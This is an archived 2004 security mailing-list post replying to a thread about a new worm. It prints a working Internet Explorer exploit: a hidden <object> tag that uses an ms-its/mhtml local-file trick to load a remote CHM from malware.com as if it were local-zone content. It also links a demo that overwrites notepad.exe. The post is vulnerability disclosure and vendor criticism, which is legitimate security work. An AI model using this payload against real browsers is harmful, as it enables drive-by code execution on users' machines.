lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <200403290137.i2T1bGO6011476@web123.megawebservers.com> From: 1 at malware.com (http-equiv@...ite.com) Subject: Re: New worm? <!-- GET / HTTP/1.1 HTTP/1.1 200 OK Server: My Bitchin' IE Infector Date: Sat Mar 27 13:22:27 2004 Content-type: text/html Accept-Encoding: identity Accept-ranges: bytes <<snip content>> --> <<reinsert content>> <object data="ms-its:mhtml:file://C:foo.mhtml! http://www.malware.com//foo.chm::/foo.html" type="text/x- scriptlet" style="visibility:hidden"> This is brilliant. Simplicity at it's best. While the original is not particularly robust the above container should remedy that. In typical fashion Internet Explorer and it's 'masters' can simply be fooled into thinking they are in the 'local zone' via a non-existent file on the drive. Quite trivial to achieve and at the same time absolutely brilliant. This is all quite reminiscent of the Ibiza Trojan from beginning February 2004 which would make this unpatched problem well over one month now. Fully functional working demo, harmless .exe which over-writes notepad.exe, the 'guts' of this particular demo which will be flagged by any competent anti-virus suite should not be considered the solution. The manufacturer of this particular product that allows for all of this should be the one to address it - once and for all - at the core level: http://www.malware.com/junk-de-lux.html End Call -- http://www.malware.com
Powered by blists - more mailing lists